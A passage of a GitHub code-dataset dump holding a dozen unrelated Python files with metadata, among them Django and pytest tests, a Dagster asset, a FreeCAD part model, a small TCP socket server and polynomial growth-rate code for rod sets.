wall.intersects(Position(x1, y1), Position(x2, y2)):\n to_remove.append(wall)\n for wall in to_remove:\n self.level.walls.remove(wall)\n\n\n\nTOOLS = [\n PlayerTool,\n GoalTool,\n WallTool,\n PortalWallTool,\n LedgeTool,\n DoorTool,\n GrillTool,\n Portal1Tool,\n Portal2Tool,\n CubeTool,\n ButtonTool,\n TriggerTool,\n EraserTool,\n]\n","repo_name":"michaelelin/portal_planner","sub_path":"portal/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":8387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4262653398","text":"import glob\nimport inspect\nimport os.path\nimport pytest\nimport re\nimport shutil\n\nfrom publicprize import debug as ppd\nfrom publicprize import config\nfrom publicprize.debug import pp_t\n\n_request_logger = None\n\n_expect = {\n 'environ': 'some environ',\n 'status': 'some status',\n 'response_headers': 'some headers',\n 'response_data': 'some write',\n 'other': 'hello'\n}\n\ndef _init_debug(test_mode, regex):\n ppd._request_logger = None\n ppd._trace_printer = None\n ppd._app = None\n mock = MockApp()\n mock.config = {\n 'PUBLICPRIZE': {\n 'TRACE': regex,\n 'TEST_MODE': test_mode}}\n ppd.init(mock)\n return mock\n\nclass MockApp(object):\n \n def __init__(self):\n self.wsgi_app = self\n self.called__call__ = 0\n \n def __call__(self, environ, start_response):\n global _expect\n global 
_request_logger\n self.called__call__ += 1\n start_response(_expect['status'], _expect['response_headers'])\n return _expect['response_data']\n\ndef test_nothing():\n global _request_logger\n mock = _init_debug(0, None)\n assert mock.wsgi_app == mock\n \ndef test_log():\n global _expect\n global _request_logger\n if os.path.exists('debug'):\n shutil.rmtree('debug')\n os.mkdir('debug')\n called_start_response = 0\n mock = _init_debug(1, None)\n _request_logger = ppd.get_request_logger()\n def start_response(status, response_headers, exc_info=None):\n nonlocal called_start_response\n called_start_response += 1\n \n def assert_file(index, suffix):\n name = os.path.join('debug', index + '-' + suffix)\n assert os.path.exists(name), name\n with open(name, 'r') as f:\n actual = f.read()\n assert actual == _expect[suffix], suffix + '=' + actual\n\n response = mock.wsgi_app(_expect['environ'], start_response)\n assert '00000003-response_headers' in _request_logger.last_file_name()\n _request_logger.set_log_dir('new_dir')\n for ignore in response:\n pass\n assert '00000001-response_data' in _request_logger.last_file_name() \n response.close()\n _request_logger.log('hello', 'other')\n\n assert mock.called__call__ == 1\n assert called_start_response == 1\n assert_file('00000001', 'environ')\n assert_file('00000002', 'status')\n assert_file('00000003', 'response_headers')\n assert_file('new_dir/00000001', 'response_data')\n assert_file('new_dir/00000002', 'other')\n _request_logger.log('not written', 'invalid/suffix')\n assert list(glob.glob('debug/*invalid*')) == [], 'found invalid/suffix'\n\ndef test_trace():\n _last_msg = None\n def _init(regex):\n nonlocal _last_msg\n _last_msg = None\n _init_debug(0, regex)\n ppd._trace_printer.write = _write\n\n def _write(msg):\n nonlocal _last_msg\n _last_msg = msg\n\n def expect(msg):\n return './tests/test_debug.py:{}:test_trace {}\\n'.format(inspect.currentframe().f_back.f_lineno - 1, msg)\n\n _init(None)\n pp_t('hello')\n assert None == _last_msg\n\n _init('.')\n pp_t('hello')\n assert expect('hello') == _last_msg \n pp_t('x{}x', ['y'])\n assert expect('xyx') == _last_msg \n\n _init('goodbye')\n pp_t('hello')\n assert None == _last_msg \n pp_t('goodbye')\n assert expect('goodbye') == _last_msg \n \n","repo_name":"biviosoftware/publicprize","sub_path":"tests/test_debug.py","file_name":"test_debug.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4045944195","text":"\"\"\"\nAquest mòdul serveix per descomprimir l'arxiu twitter_reduced.zip\n\"\"\"\n\nimport os\nimport glob\nimport zipfile\nimport csv\n\n\ndef decompress_data():\n \"\"\"\n Funció per descomprimir l'arxiu twitter_reduced.zip\n Return: twitter_reduced.csv\n \"\"\"\n\n # Definim el directori al arxiu per descomprimir\n zip_files = glob.glob('./data/twitter_reduced.zip')\n if zip_files:\n zip_file = zip_files[0]\n directory = os.path.dirname(zip_file)\n\n # Descomprimim l'arxiu i el guardem a la carpeta data\n with zipfile.ZipFile(zip_file, 'r') as z:\n z.extractall(directory)\n\n print(\"L'arxiu s'ha descomprimit i guardat a la carpeta data\")\n\n\ndef csv_to_list_dict(path_to_file):\n \"\"\"\n Funció per passar un csv a una llista de diccionaris.\n :param path_to_file: Arxiu csv com a input.\n :return: Llista de diccionaris.\n \"\"\"\n # Creem una llista buida\n list_dict = []\n\n # Obrim l'arxiu i el llegim\n with open(path_to_file, 'r', newline='', encoding='utf-8') as f:\n reader = 
csv.DictReader(f)\n\n # Iterem per cada línia, la passem a diccionari i l'afegim a la llista\n for row in reader:\n list_dict.append(dict(row))\n return list_dict\n","repo_name":"vtierz/pec4","sub_path":"dataset/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24451528309","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\n# @Author : xuan\n中位数是一个可将数值集合划分为相等的上下两部分的一个数值。\n如果列表数据的个数是奇数,则列表中间那个数据就是列表数据的中位数;\n如果列表数据的个数是偶数,则列表中间那2个数据的算术平均值就是列表数据的中位数。\n在这个任务里,你将得到一个含有自然数的非空数组(X)。你必须把它分成上下两部分,找到中位数。\n\"\"\"\n\ndef checkio(data):\n new_data = sorted(data)\n if len(data) % 2 != 0:\n return new_data[int(len(data)/2)]\n else:\n return (new_data[len(data)//2 -1] + new_data[len(data)//2])/2\n\n\n#These \"asserts\" using only for self-checking and not necessary for auto-testing\nif __name__ == '__main__':\n assert checkio([1, 2, 3, 4, 5]) == 3, \"Sorted list\"\n assert checkio([3, 1, 2, 5, 3]) == 3, \"Not sorted list\"\n assert checkio([1, 300, 2, 200, 1]) == 2, \"It's not an average\"\n assert checkio([3, 6, 20, 99, 10, 15]) == 12.5, \"Even length\"\n print(\"Start the long test\")\n assert checkio(list(range(1000000))) == 499999.5, \"Long.\"\n print(\"The local tests are done.\")\n print(checkio([1, 2, 3, 4, 5, 6]))","repo_name":"kxeg/checkio","sub_path":"checkio/Median.py","file_name":"Median.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72598424488","text":"# Problem #1026\n# Author: Dalton Lima @daltonbr\n# 07/04/17\n# https://www.urionlinejudge.com.br/judge/en/problems/view/1026\n\nimport fileinput\n\nfor line in fileinput.input():\n #print(\"line read: \", line)\n value_list = line.split()\n\n # Converting str to int ... with list comprehension\n int_list = line.split()\n int_list = [int(i) for i in int_list]\n\n # ... 
or we could user map function also\n # int_list = list(map(int, int_list))\n\n # it's a simple bitwise xor (operator ^)\n print(int_list[0] ^ int_list[1])\n","repo_name":"daltonbr/problems","sub_path":"_URI/1026-ToCarryOrNotToCarry/carry.py","file_name":"carry.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6388199832","text":"# tests.py\n# from django.test import TestCase\nfrom django.urls import reverse\nimport pytest\nfrom pytest_django.asserts import assertTemplateUsed # assertQuerysetEqual\nfrom .models import MyUser, Note\n\n\n# Test on correct Routing page:\n@pytest.mark.urls(\"scheduler.urls\")\ndef test_login_route(client):\n response = client.get(reverse(\"login\"))\n assert response.status_code == 200\n assertTemplateUsed(response, \"login.html\")\n assert b\"Register\" in response.content\n\n\n# Test on single Note for User:\n@pytest.mark.django_db\n@pytest.mark.urls(\"scheduler.urls\")\ndef test_user_have_single_note(client):\n # Create a User in DB\n single_note_user = MyUser.objects.create(\n name=\"User1\", password=\"cryptography_staff_123\", language=\"Polish\", grade=\"Low\"\n )\n\n # Create the User Note in DB:\n new_note = Note.objects.create(\n user_note=single_note_user,\n title=\"Test Note\",\n msg=\"This is a test note\",\n assignee=\"Test User\",\n e_mail=\"Test_Email@ithillel.ua\",\n )\n\n # Access the user's notes page:\n response = client.get(reverse(\"user_info\", kwargs={\"username\": new_note.user_note}))\n assert response.status_code == 200\n assertTemplateUsed(response, \"admin_user_info.html\")\n\n # Check if the note is present in the response:\n assert new_note.title in response.content.decode()\n\n # We are on page: http://127.0.0.1:8000/users/John/\n # Only user info here and Note titles\n\n\n# Test on three Notes for User:\n@pytest.mark.django_db\n@pytest.mark.urls(\"scheduler.urls\")\ndef test_user_have_3_notes(client):\n # Create a user in DB:\n multi_note_user = MyUser.objects.create(\n name=\"David\",\n password=\"cryptography_staff_321\",\n language=\"Esperanto\",\n grade=\"Medium\",\n )\n\n # Create a User Note1 in DB:\n new_note1 = Note.objects.create(\n user_note=multi_note_user,\n title=\"Holiday Plans\",\n msg=\"Sunbathe on a beach\",\n assignee=\"Evan Tree\",\n e_mail=\"Test_Email1@ithillel.ua\",\n )\n\n # Create a User Note2 in DB:\n new_note2 = Note.objects.create(\n user_note=multi_note_user,\n title=\"Morning Routine\",\n msg=\"Walk a Dog\",\n assignee=\"Chris Newdawn\",\n e_mail=\"Test_Email2@ithillel.ua\",\n )\n\n # Create a User Note3 in DB:\n new_note3 = Note.objects.create(\n user_note=multi_note_user,\n title=\"Animal Care\",\n msg=\"Give Meds\",\n assignee=\"Samanta Hopper\",\n e_mail=\"Test_Email3@ithillel.ua\",\n )\n\n # Access the user's notes page (\"username\" is same for all 3):\n multi_response = client.get(\n reverse(\"user_info\", kwargs={\"username\": new_note1.user_note})\n )\n assert multi_response.status_code == 200\n assertTemplateUsed(multi_response, \"admin_user_info.html\")\n\n # Check if all 3 notes are present in the response:\n assert (\n new_note1.title and new_note2.title and new_note3.title\n ) in multi_response.content.decode()\n\n # We are on page: http://127.0.0.1:8000/users/David/\n # Only user info here and Note 
titles\n","repo_name":"Northman94/PyProZh","sub_path":"Lesson10/organizer10/scheduler/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20030927569","text":"import numpy as np\nimport pandas as pd\nfrom computecost import computecost\nfrom computecost import sigmoid\ndef gradientDesent(X,y,alpha,num_iter):\n \"\"\"X为特征矩阵,y为标签数组,theta为角度,alpha为学习效率,num_iters为所迭代的次数,\n 此函数为梯度算法,返回最小角度和代价函数矩阵\"\"\"\n m, n = X.shape # 样本总量\n theta = np.zeros((n, 1))\n m=len(y)#样本总量\n theta=theta.reshape(-1,1)\n J_history=np.zeros((num_iter,1))#将代价函数矩阵初始为零矩阵\n for iter in range(num_iter):\n s=sigmoid(np.dot(X,theta))#调用sigmoid函数\n theta=theta-alpha*np.dot(X.T,(s-y))/m#梯度函数应用\n J_history[iter][0]=computecost(s,y)#调用代价函数,每次迭代的结果写入,更新矩阵值\n return theta,J_history\n","repo_name":"karagg/tt","sub_path":"logistic/gradientDesent.py","file_name":"gradientDesent.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9880575717","text":"import pandas as pd\n\nfrom dagster import MaterializeResult, MetadataValue, asset\n\n# start_add_signsup_asset\nfrom .resources import DataGeneratorResource\n\n# ...\n\n\n@asset\ndef signups(hackernews_api: DataGeneratorResource) -> MaterializeResult:\n signups = pd.DataFrame(hackernews_api.get_signups())\n\n signups.to_csv(\"data/signups.csv\")\n\n return MaterializeResult(\n metadata={\n \"Record Count\": len(signups),\n \"Preview\": MetadataValue.md(signups.head().to_markdown()),\n \"Earliest Signup\": signups[\"registered_at\"].min(),\n \"Latest Signup\": signups[\"registered_at\"].max(),\n }\n )\n\n\n# end_add_signsup_asset\n","repo_name":"dagster-io/dagster","sub_path":"examples/docs_snippets/docs_snippets/tutorial/connecting/assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"70549139689","text":"from typing import Dict\n\n\nclass DisplaySegment(object):\n ON_STR_HORIZ = \"===\"\n OFF_STR_HORIZ = \"___\"\n ON_STR_VERT = \"B\"\n OFF_STR_VERT = \"|\"\n\n def __init__(self):\n self.anode = True # type: bool\n self.cathodes = {chr(c): False for c in range(ord('a'), ord('f') + 1)} # type: Dict[str: bool]\n self.cathodes[\"dp\"] = False\n\n def __repr__(self):\n r = \".%s.\\n%s...%s\\n%s...%s\\n.%s%s\" % \\\n (self.ON_STR_HORIZ if self.cathodes[\"a\"] else self.OFF_STR_HORIZ,\n self.ON_STR_VERT if self.cathodes[\"f\"] else self.OFF_STR_VERT,\n self.ON_STR_VERT if self.cathodes[\"b\"] else self.OFF_STR_VERT,\n self.ON_STR_VERT if self.cathodes[\"e\"] else self.OFF_STR_VERT,\n self.ON_STR_VERT if self.cathodes[\"c\"] else self.OFF_STR_VERT,\n self.ON_STR_HORIZ if self.cathodes[\"a\"] else self.OFF_STR_HORIZ,\n \"*\" if self.cathodes[\"dp\"] else \".\")\n return r\n\n\nclass SevenSegmentDisplay(object):\n def __init__(self):\n self.segments = [DisplaySegment() for _ in range(0, 8)]\n","repo_name":"Vadman97/PicoSim","sub_path":"hardware_sim/seven_segment_display.py","file_name":"seven_segment_display.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"33172266248","text":"import supalib\n\nEPS = 0.01\nTOLE = 0.2\n\nBUMBER_STICK_SEPARATION = 30\nBUMBER_STICK_XSIZE = 10\nBUMBER_STICK_YSIZE = 10\nBUMBER_STICK_LEN = 
120\n\nMOUNT_B_OFFSET = -70\nMOUNT_THICKNESS = 4\nMOUNT_YSIZE = 30\nMOUNT_STIC_SIZE = 2*MOUNT_THICKNESS + BUMBER_STICK_YSIZE\n\n\ndef crete_single_mount( with_hole ):\n raw = supalib.create_box( size=(MOUNT_STIC_SIZE , MOUNT_YSIZE , MOUNT_STIC_SIZE ), place = (0, 0, 0 ) )\n \n if with_hole == False:\n offset_y = -EPS\n else:\n offset_y = MOUNT_THICKNESS*0.5\n \n hole = supalib.create_box( size=( BUMBER_STICK_XSIZE + 2*TOLE, MOUNT_YSIZE + 2*EPS, BUMBER_STICK_YSIZE + 2*TOLE ), place = (MOUNT_THICKNESS - TOLE, offset_y, MOUNT_THICKNESS - TOLE) )\n return supalib.create_cut( raw, hole )\n\ndef create_base_mount():\n raw = supalib.create_box( place=(-BUMBER_STICK_SEPARATION - EPS, -EPS,-TOLE), size=( 2*BUMBER_STICK_SEPARATION + 2*EPS, MOUNT_YSIZE + 2*EPS, MOUNT_THICKNESS ) )\n BOLT_SEP = MOUNT_YSIZE/4.0\n hole1 = supalib.create_cyl( place=(0, MOUNT_YSIZE*0.5 + BOLT_SEP, -1.0), radius=1.5 + TOLE, size_z=10)\n hole2 = supalib.create_cyl( place=(0, MOUNT_YSIZE*0.5 - BOLT_SEP, -1.0), radius=1.5 + TOLE, size_z=10)\n holes = supalib.create_union( (hole1, hole2 ) )\n return supalib.create_cut( raw, holes )\n\n\ndef create_full_part( with_hole, label ):\n base = create_base_mount() \n mount_1 = crete_single_mount( with_hole )\n mount_2 = crete_single_mount( with_hole )\n supalib.relocate( mount_1, place=( BUMBER_STICK_SEPARATION - MOUNT_STIC_SIZE, 0, -EPS ) )\n supalib.relocate( mount_2, place=( -BUMBER_STICK_SEPARATION, 0, -EPS ) )\n mount = supalib.create_union( ( mount_1, mount_2, base ) )\n mount.Label = label\n return mount\n\nSTICK_PLACE_A=(BUMBER_STICK_SEPARATION - MOUNT_STIC_SIZE + (MOUNT_STIC_SIZE - BUMBER_STICK_XSIZE)*0.5 - TOLE*0.0 , MOUNT_B_OFFSET + 10.0, MOUNT_THICKNESS )\nSTICK_PLACE_B=(-BUMBER_STICK_SEPARATION + (MOUNT_STIC_SIZE - BUMBER_STICK_XSIZE)*0.5 + TOLE*0.0, MOUNT_B_OFFSET + 10.0, MOUNT_THICKNESS )\ndef create_stick():\n thick = (MOUNT_STIC_SIZE - BUMBER_STICK_XSIZE)*0.5\n bsize = BUMBER_STICK_XSIZE - 2 *TOLE\n b1 = supalib.create_box( size=( bsize, BUMBER_STICK_LEN, bsize), place =STICK_PLACE_A )\n b2 = supalib.create_box( size=( bsize, BUMBER_STICK_LEN, bsize), place =STICK_PLACE_B )\n b3 = supalib.create_box( size=( 2*BUMBER_STICK_SEPARATION - 2*EPS - MOUNT_STIC_SIZE + bsize*0.25, bsize, bsize), place=( bsize*0.25 + -BUMBER_STICK_SEPARATION + thick + EPS, -BUMBER_STICK_XSIZE - TOLE, MOUNT_THICKNESS ) )\n b1 = supalib.create_fillet( b1 )\n b2 = supalib.create_fillet( b2 )\n part = supalib.create_union( ( b1,b2,b3) )\n part.Label = \"Stick\"\n return part\n\ndef create_bumber():\n BUMBER_SIZE_MINUS = 60 + BUMBER_STICK_SEPARATION\n BUMBER_SIZE_PLUS = 30 + BUMBER_STICK_SEPARATION\n BUMBER_MOUNT_SIZE = BUMBER_STICK_XSIZE + 2*MOUNT_THICKNESS + TOLE\n def create_bmount():\n raw = supalib.create_box( size=( BUMBER_MOUNT_SIZE, MOUNT_THICKNESS, BUMBER_MOUNT_SIZE) )\n hole = supalib.create_box( size=( BUMBER_STICK_XSIZE + 2*TOLE, MOUNT_THICKNESS*0.5, BUMBER_STICK_XSIZE + 2*TOLE ), place=(MOUNT_THICKNESS - TOLE, 0.0, MOUNT_THICKNESS - TOLE) )\n return supalib.create_cut( raw, hole )\n\n m1 = create_bmount()\n m2 = create_bmount()\n \n s0 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,2*BUMBER_MOUNT_SIZE + MOUNT_THICKNESS) )\n s1 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,BUMBER_MOUNT_SIZE - EPS ) )\n s2 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), 
place=(-BUMBER_SIZE_MINUS,0,-MOUNT_THICKNESS - EPS) )\n s3 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n hsize = ( MOUNT_THICKNESS, MOUNT_THICKNESS, 3*(MOUNT_THICKNESS + BUMBER_MOUNT_SIZE) + MOUNT_THICKNESS + EPS )\n d1 = supalib.create_box( size=hsize, place=(-BUMBER_SIZE_MINUS,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d2 = supalib.create_box( size=hsize, place=( BUMBER_SIZE_PLUS - MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n d3 = supalib.create_box( size=hsize, place=( -BUMBER_STICK_SEPARATION - MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d4 = supalib.create_box( size=hsize, place=( -BUMBER_STICK_SEPARATION + BUMBER_MOUNT_SIZE ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d5 = supalib.create_box( size=hsize, place=( BUMBER_STICK_SEPARATION ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d6 = supalib.create_box( size=hsize, place=( BUMBER_STICK_SEPARATION - BUMBER_MOUNT_SIZE - MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n \n d7 = supalib.create_box( size=hsize, place=( 0.5*( -BUMBER_STICK_SEPARATION - MOUNT_THICKNESS - BUMBER_SIZE_MINUS) ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n #d5 = supalib.create_box( size=hsize, place=( 2*BUMBER_STICK_SEPARATION ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n #d6 = supalib.create_box( size=hsize, place=( 2*BUMBER_STICK_SEPARATION -BUMBER_MOUNT_SIZE -MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n\n sup = supalib.create_union( (s0, s1,s2,s3,d1,d2,d3, d4, d5, d6, d7 ) )\n # ,d5,d6\n supalib.relocate( m1, place=(STICK_PLACE_A[0] - MOUNT_THICKNESS, STICK_PLACE_A[1] + BUMBER_STICK_LEN, 0 ) )\n supalib.relocate( m2, place=(STICK_PLACE_B[0] - MOUNT_THICKNESS, STICK_PLACE_A[1] + BUMBER_STICK_LEN, 0 ) )\n supalib.relocate( sup, place=(0.0, STICK_PLACE_A[1] + BUMBER_STICK_LEN, 0 ) )\n bumber = supalib.create_union( (sup, m1, m2 ) )\n bumber.Label=\"Bumber\"\n return bumber\n \n \nbumber = create_bumber() \nmount_a = create_full_part ( False, \"Mount_front\" )\nmount_b = create_full_part ( True, \"Mount_rear\" )\nsupalib.relocate( mount_b, place=( 0.0, MOUNT_B_OFFSET , 0.0) )\n\nstick = create_stick()\n\n\nfor x in [ bumber, mount_a, mount_b, stick ]:\n supalib.creta_mesh_from( x )\n\nsupalib.finish()\n\n\n\n\n","repo_name":"susundberg/zephyr-robot-supa2019","sub_path":"3d_parts/robot_bumber_mount_a.py","file_name":"robot_bumber_mount_a.py","file_ext":"py","file_size_in_byte":6198,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"17111691253","text":"#!/usr/bin/env python3\n# *_* coding: utf-8 *_*\n\n\"\"\"TCP Server library\"\"\"\n\nimport socket\nimport select\nimport time\nimport getmac\n\nclass new_connection(Exception):\n \"\"\"TCP: New connection detected\"\"\"\n pass\n\nclass address_does_not_exist(Exception):\n \"\"\"TCP: Address does exist in dictionary\"\"\"\n def __init__(self, *args):\n super().__init__(*args)\n\ndef get_ip():\n \"\"\"Find local IP of the current network interface, avoid 127.0.0.1\"\"\"\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n # doesn't even have to be reachable\n s.connect(('10.255.255.255', 1))\n IP = s.getsockname()[0]\n except:\n IP = '127.0.0.1'\n finally:\n s.close()\n return IP\n\n\ndef receive_message(client_socket):\n \"\"\"Recive message from client_socket\"\"\"\n try:\n mess = client_socket.recv(1024)\n if (not len(mess)):\n 
return False\n elif (len(mess) <= 2) or (mess == '\\r\\n'):\n return\n return mess\n \n except:\n return False\n\nclass tcp_server:\n \"\"\"Create a TCP/IP Server\"\"\"\n def __init__(self,IP,PORT):\n self.IP = IP\n self.PORT = PORT\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setblocking(0)\n self.server_socket.bind((self.IP, self.PORT))\n self.server_socket.listen(5)\n self.sockets_list = [self.server_socket]\n self.socket_list_by_mac = {}\n self.id_dict = {}\n self.msg = {}\n self.read_sockets = []\n self.write_sockets = []\n self.exception_sockets = []\n self.mac_list = []\n \n\n def update_sockets_list(self):\n \"\"\"Update sockets list to read_sockets, write_sockets, exception_sockets\"\"\"\n self.read_sockets, self.write_sockets, self.exception_sockets = select.select(self.sockets_list, self.sockets_list, [], 0)\n\n def check_read_sockets(self):\n \"\"\"Handle new connection after updating socket lists\"\"\" \n for notified_socket in self.read_sockets:\n if notified_socket == self.server_socket:\n raise new_connection('New Connection')\n\n def new_socket_handler(self):\n \"\"\"New socket handler\"\"\"\n client_socket, client_address = self.server_socket.accept()\n client_mac = getmac.get_mac_address(ip = client_address[0], network_request=True)\n client_socket.setblocking(0)\n self.sockets_list.append(client_socket)\n logic = True\n for mac in self.mac_list:\n if mac == client_mac:\n client_socket.send(b\"Welcome back!\")\n logic = False\n try:\n self.sockets_list.remove(self.socket_list_by_mac[mac])\n except ValueError:\n pass\n self.socket_list_by_mac[mac]=client_socket\n return\n\n if logic:\n raise address_does_not_exist(client_socket, client_address)\n\n def create_new_socket(self, client_socket, client_address, id):\n \"\"\"Create new TCP socket\"\"\"\n client_mac = getmac.get_mac_address(ip = client_address[0], network_request=True)\n self.id_dict[client_mac] = id\n self.mac_list.append(client_mac)\n self.socket_list_by_mac[client_mac] = client_socket\n \n def send_all(self, mess):\n \"\"\"THIS FUNCTION IS WRONG\"\"\"\n for key in self.id_dict:\n if (self.id_dict[key] != 'UPS') and (self.id_dict[key] != 'AC') and (key != self.server_socket):\n key.send(mess.encode('utf-8'))\n\n def therm_parsing(self, mess):\n \"\"\"Split a message from a client into 2 variables by spaces\"\"\"\n mess_list = mess.split()\n if len(mess_list) == 2:\n return mess_list[0], mess_list[1]\n\n def recv_all(self):\n \"\"\"Receive all messages from clients and parse as therm\"\"\"\n self.update_sockets_list()\n return_list = []\n for notified_socket in self.read_sockets:\n if notified_socket != self.server_socket:\n client_mac = getmac.get_mac_address(ip = notified_socket.getpeername()[0])\n if self.id_dict[client_mac] != 'UPS':\n mess_dict = {'ID':self.id_dict[client_mac]}\n message = receive_message(notified_socket)\n if message is False:\n self.sockets_list.remove(notified_socket)\n continue\n elif message == None:\n continue\n message = message.strip()\n try:\n temp, humid = self.therm_parsing(message)\n mess_dict['Temp'] = temp.decode('utf-8')\n mess_dict['Humid'] = humid.decode('utf-8')\n return_list.append(mess_dict)\n except TypeError:\n return_list = []\n\n return return_list","repo_name":"nguyenmthien/VGUServer_archive","sub_path":"ESP8266/PowerEfficient/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"23544944552","text":"\"\"\"\ncode to explore families of finite rod sets\n\nUsage: uncomment fragments after the line\n### code to execute here\n\nlast modified: 12/31/2021\n\n@author: Ethan Bolker\n\nto do: \n\nRefactor to get remove translations to and from bitstrings. \nRod sets are now specified by lists of rod lengths.\n\nImprove plotroots so that it plots all the circles corresponding to \nthe roots of the minimal polynomial, not just the one for the growth \nrate.\n- problem same as below\n\nAdd to rodsetattributes\n data.shiftpoly({\"shiftpoly\":spolystr})\ncontaining the shift polynomial - that's the\nquotient of the cpoly and the minimal poly.\n- problem: the code in rodsetattributes knows only the\n growth rate, not the factor of the cpoly that's the\n minimal polynomial. If we can't easily figure this\n out here, we might have to do it in findfamilies, when we \n know the minimal polynomial because it's (usually) the\n first one encountered.\n\"\"\"\nimport sys\nimport math\nfrom utilities import *\nfrom multi import multi\nfrom convolve import p2t\nfrom sympy import roots as sroots\nfrom sympy import solve as solve\nfrom sympy import factor as factor\nfrom numpy import *\nimport numpy as np\nimport numpy.polynomial.polynomial as poly\nimport matplotlib.pyplot as plt\n\nfrom itertools import combinations\n\ndef mygcd(mylist):\n if len(mylist) == 1:\n return mylist[0]\n else:\n return math.gcd( mylist[0],mygcd(mylist[1:]))\n\n# zzzzzzzzz\ndef build_recursion_polynomial(spots):\n ''' from input spots = [1,2,2,2,4] build recursion polynomial\n x**3 - 3*x**2 - x**1 - 1\n ''' \n coeffs = build_cuisenaire_poly_coefficients(spots)\n polystr = str(coeffs[0])\n for i in range(1,len(coeffs)-1):\n if coeffs[i] != 0:\n c = coeffs[i]\n if c > 0:\n sign = str('+')\n else:\n sign = str('-') \n polystr += sign + str(abs(c)) + '*x**' + str(i)\n polystr += '+ x**' + str(len(coeffs)-1)\n return polystr\n\n# deprecated\ndef xxxbuild_recursion_polynomial_coeffs(bits):\n ''' from input bit string 1011 build recursion polynomial\n coefficients as list [-1, -1, 0, -1, 1].\n Coefficients from constant term to degree 4.\n '''\n n = len(bits)\n coeffs = [1]\n for j in range(n)[:-1]:\n b = int(bits[j])\n coeffs.append(-b)\n coeffs.append(-1) \n coeffs.reverse()\n return coeffs\n\n# This function is no longer called. The growth rate is\n# the largest root of the Cuisenaire polynomial.\ndef xgrowthrate(d):\n ''' Calculate the growth rate for total solutions\n for the puzzle problem R(d). Here d is the \n bit string specifying which C_k are allowed, \n or that bit string as a plug number, \n or a list [a,b,...] 
of positions of 1 bits.\n The algorithm pads with lots of 0s to stabilize growth.\n Adjusts when gcd of plug lengths > 1.\n '''\n if isinstance(d, str): # d is a bitstring like \"101\"\n xd = bitstring2bits(d)\n elif isinstance(d, int): # convert integer d to binary\n xd = [int(i) for i in bin(d)[2:]]\n elif isinstance(d, list):\n xd = spots2bits(d)\n else:\n print(f\"type error {d}\")\n return\n spots = bits2spots(xd)\n gcd = mygcd(spots)\n spotsum = sum(spots)\n expand = 300\n lookat = expand*gcd\n zeros = 2*lookat\n goodspot = spotsum + lookat - 1\n xd.extend([0]*zeros)\n totals = p2t(xd)\n rate = (totals[goodspot + gcd]/totals[goodspot])**(1/gcd)\n return(rate)\n\ndef growthrate(rods):\n coeffs = build_cuisenaire_poly_coefficients(rods)\n r1 = poly.polyroots(coeffs)\n# maxroot = np.round(np.abs(max(r1)),10)\n maxroot = np.abs(max(r1))\n return maxroot\n \ndef rodsetattributes(input):\n ''' Create dictionary of attributes the input rod set.\n Rod set should really be an object.\n '''\n# if isinstance(input, str): # d is a bitstring like \"101\"\n# bits = input\n# elif isinstance(input, list):\n# bits = spots2bitstring(input)\n# else:\n# print(f\"type error {input}\")\n# return\n data = {}\n mypoly = build_recursion_polynomial(input)\n fpoly = factor(mypoly)\n coeffs = build_cuisenaire_poly_coefficients(input) \n# print(\"xxx mypoly\", mypoly)\n# 